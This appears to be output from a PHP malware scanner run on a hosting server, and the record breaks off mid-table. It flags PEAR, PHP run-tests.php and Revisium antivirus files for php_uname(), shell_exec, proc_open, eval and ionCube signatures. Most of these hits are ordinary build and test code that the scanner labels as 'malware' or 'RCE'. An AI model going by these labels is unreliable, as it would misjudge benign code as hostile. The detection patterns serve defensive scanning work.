Sign 963e968a Line: 276 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/PEAR/DependencyDB.php Size: 23.49 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 476 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/PEAR/Registry.php Size: 73.86 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 813 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/PEAR/RunTest.php Size: 35.12 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; $e = $w = null; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $data .= "\n ** ERROR: process timed out **\n"; proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = frea...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//opt/php71/share/pear/PEAR/Installer.php Size: 68.23 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//opt/php71/share/pear/PEAR/ErrorStack.php Size: 33.01 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//opt/php71/share/pear/pearcmd.php Size: 14.68 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 415 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/Archive/Tar.php Size: 83.18 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); $v_uname = $userinfo['name']; $v_gname = $groupinfo['name']; } else { $v_uname = ''; $v_gname = ''; } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack( "a100a8a8a8a12a12", $v_reduced_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime ); $v_binary_data_last = pack( "a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_devmajor, $v_devminor, $v_pref...
|
|
//opt/php71/share/pear/OS/Guess.php Size: 10.34 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//opt/php71/lib/php/php/build/run-tests.php Size: 80.67 kB Created: 2021-11-01 20:26:11 Modified: 2022-01-04 22:25:23 Warns: 7 Dangers: 4
| Description | Match |
|---|
Exploit execution Line: 393 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('PHP_AUTOCONF')
| Exploit execution Line: 413 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
system(getenv('CC')
| Exploit execution Line: 415 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('CC')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($section_text['REDIRECTTEST']); $IN_REDIRECT['via'] = "via [$shortname]\n\t"; $IN_REDIRECT['dir'] = realpath(dirname($file)); $IN_REDIRECT['prefix'] = trim($section_text['TEST']); if (count($IN_REDIRECT['TESTS']) == 1) { if (is_array($org_file)) { $test_files[] = $org_file[1]; } else { $GLOBALS['test_files'] = $test_files; find_files($IN_REDIRECT['TESTS']); foreach($GLOBALS['test_files'] as $f) { $test_files[] = array($f, $file); } } $test_cnt += @count($test_files) - 1; $test_idx--; show_r...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_tested) { $index = "# $redir_tested: $name"; } else { $index = $name; } $test_idx++; $result = run_test($php, $name, $env); if (!is_array($name) && $result != 'REDIR') { $test_result...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } $code = proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_test...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open() is available. |
| Please check if you disabled it in php.ini. |
+-----------------------------------------------------------+
NO_PROC_OPEN_ERROR;
exit(1); } if (ini_get('date.timezone') == '') { date_default_timezone_set('UTC'); } $CUR_DIR = getcwd(); if (getenv('TEST_PHP_SRCDIR')) { @chdir(getenv('TEST_PHP_SRCDIR')); } putenv('SSH_CLIENT=deleted'); putenv('SSH_AUTH_SOCK=deleted'); putenv('SSH_TTY=deleted'); putenv('SSH_CONNECTION=deleted'); $cwd = getcwd(); set_tim...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc, 9); return $data; } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } $code = proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_resu...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec(getenv('PHP_AUTOCONF') . ' --version'); } else { $autoconf = shell_exec('autoconf --version'); } $libtool = shell_exec($CUR_DIR . '/libtool --version'); $sys_libtool_path = shell_exec(__DIR__ . '/build/shtool path glibtool libtool'); if ($sys_libtool_path) { $sys_libtool = shell_exec(str_replace("\n", "", $sys_libtool_path) . ' --version'); } $flags = array('-v', '-V', '--version'); $cc_status = 0; foreach($flags AS $flag) { system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status);...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status); if ($cc_status == 0) { $compiler = shell_exec(getenv('CC') . " $flag 2>&1"); break; } } $ldd = shell_exec("ldd $php 2>/dev/null"); } $failed_tests_data .= "Autoconf:\n$autoconf\n"; $failed_tests_data .= "Bundled Libtool:\n$libtool\n"; $failed_tests_data .= "System Libtool:\n$sys_libtool\n"; $failed_tests_data .= "Compiler:\n$compiler\n"; $failed_tests_data .= "Bison:\n". shell_exec('bison --version 2>/dev/null') . "\n"; $failed_tests_d...
| Sign 963e968a Line: 250 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/PEAR.php Size: 35.32 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//opt/php74/share/pear/PEAR/Builder.php Size: 18.50 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//opt/php74/share/pear/PEAR/Dependency2.php Size: 49.26 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 276 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/PEAR/DependencyDB.php Size: 23.60 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 478 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/PEAR/Registry.php Size: 74.03 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 814 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/PEAR/RunTest.php Size: 35.14 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; unset($r[0]); $e = $w = []; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $data .= "\n ** ERROR: process timed out **\n"; proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { ...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//opt/php74/share/pear/PEAR/Installer.php Size: 68.43 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//opt/php74/share/pear/PEAR/ErrorStack.php Size: 33.01 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//opt/php74/share/pear/pearcmd.php Size: 14.49 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 409 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php74/share/pear/Archive/Tar.php Size: 86.26 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); if (isset($userinfo['name'])) { $v_uname = $userinfo['name']; } if (isset($groupinfo['name'])) { $v_gname = $groupinfo['name']; } } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack( "a100a8a8a8a12a12", $v_reduced_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime ); $v_binary_data_last = pack( "a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_...
|
|
//opt/php74/share/pear/OS/Guess.php Size: 11.25 kB Created: 2021-11-18 13:52:47 Modified: 2022-01-04 22:25:25 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//opt/php74/lib/php/php/build/run-tests.php Size: 124.08 kB Created: 2021-11-18 13:52:48 Modified: 2022-01-04 22:25:25 Warns: 7 Dangers: 4
| Description | Match |
|---|
Exploit execution Line: 1003 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
system(getenv('CC')
| Exploit execution Line: 1005 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('CC')
| Exploit execution Line: 983 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('PHP_AUTOCONF')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($section_text['REDIRECTTEST']); $IN_REDIRECT['via'] = "via [$shortname]\n\t"; $IN_REDIRECT['dir'] = realpath(dirname($file)); $IN_REDIRECT['prefix'] = trim($section_text['TEST']); if (!empty($IN_REDIRECT['TESTS'])) { if (is_array($org_file)) { $test_files[] = $org_file[1]; } else { $GLOBALS['test_files'] = $test_files; find_files($IN_REDIRECT['TESTS']); foreach ($GLOBALS['test_files'] as $f) { $test_files[] = array($f, $file); } } $test_cnt += count($test_files) - 1; $test_idx--; show_redir...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $result_tests_file, $php, $test_idx; global $PHP_FAILED_TESTS, $workers, $workerID, $workerSock; if ($workers !== null && !$workerID) { run_all_tests_parallel($test_files, $env, $redir_tested); return; } foreach ($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_teste...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } else if (defined('PHP_WINDOWS_VERSION_MAJOR') && (($stat["exitcode"] >> 28) & 0b1111) === 0b1100) { $data .= "\nTermsig=" . $stat["exitcode"] . "\n"; } proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open() is available. |
| Please check if you disabled it in php.ini. |
+-----------------------------------------------------------+
NO_PROC_OPEN_ERROR;
exit(1); } if (ini_get('date.timezone') == '') { date_default_timezone_set('UTC'); } putenv('SSH_CLIENT=deleted'); putenv('SSH_AUTH_SOCK=deleted'); putenv('SSH_TTY=deleted'); putenv('SSH_CONNECTION=deleted'); set_time_limit(0); ini_set('pcre.backtrack_limit', PHP_INT_MAX); while (@ob_end_clean()) { ; } if (ob_get_level()) ...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc, 9); return $data; } else if ($n > 0) { if ($captureStdOut) { $line = fread($pipes[1], 8192); } elseif ($captureStdErr) { $line = fread($pipes[2], 8192); } else { $line = ''; } if (strlen($line) == 0) { break; } $data .= $line; } } $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } else if (defined('PHP...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec(getenv('PHP_AUTOCONF') . ' --version'); } else { $autoconf = shell_exec('autoconf --version'); } $libtool = shell_exec(INIT_DIR . '/libtool --version'); $sys_libtool_path = shell_exec(__DIR__ . '/build/shtool path glibtool libtool'); if ($sys_libtool_path) { $sys_libtool = shell_exec(str_replace("\n", "", $sys_libtool_path) . ' --version'); } $flags = array('-v', '-V', '--version'); $cc_status = 0; foreach ($flags as $flag) { system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status)...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status); if ($cc_status == 0) { $compiler = shell_exec(getenv('CC') . " $flag 2>&1"); break; } } $ldd = shell_exec("ldd $php 2>/dev/null"); } $failed_tests_data .= "Autoconf:\n$autoconf\n"; $failed_tests_data .= "Bundled Libtool:\n$libtool\n"; $failed_tests_data .= "System Libtool:\n$sys_libtool\n"; $failed_tests_data .= "Compiler:\n$compiler\n"; $failed_tests_data .= "Bison:\n" . shell_exec('bison --version 2>/dev/null') . "\n"; $failed_tests_...
| Sign 963e968a Line: 844 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/siteprobuilder_files/siteprobuilder.php Size: 15.62 kB Created: 2020-11-23 10:48:09 Modified: 2021-01-20 22:41:09 Warns: 1
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec('nslookup '.$host.' 8.8.8.8'), "\n\r"); if (preg_match('#(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})$#iuU', $out, $m) && isset($m[1])) { $ip = $m[1]; } } } } return $ip; } private static function getDomainData($name = null) { if (!self::$domainData || !is_array(self::$domainData)) { $domain = self::getDomain(); $result = API::call('webdomain', array( 'su' => self::getUser(), 'elid' => $domain )); $data = array(); foreach ($result->elem as $elem) { if ((string) $elem->name == $domain || (($at...
|
|
//usr/local/mgr5/addon/revisium_antivirus/common.php Size: 12.14 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/ra_addon.php Size: 31.96 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/update.php Size: 4.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/email_checker.php Size: 2.94 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/queue.php Size: 4.80 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/post_install.php Size: 3.97 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/tools_update.php Size: 2.74 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/send_stats.php Size: 3.72 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/migrations.php Size: 7.52 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/scheduler.php Size: 4.88 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/cleaner.php Size: 2.84 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
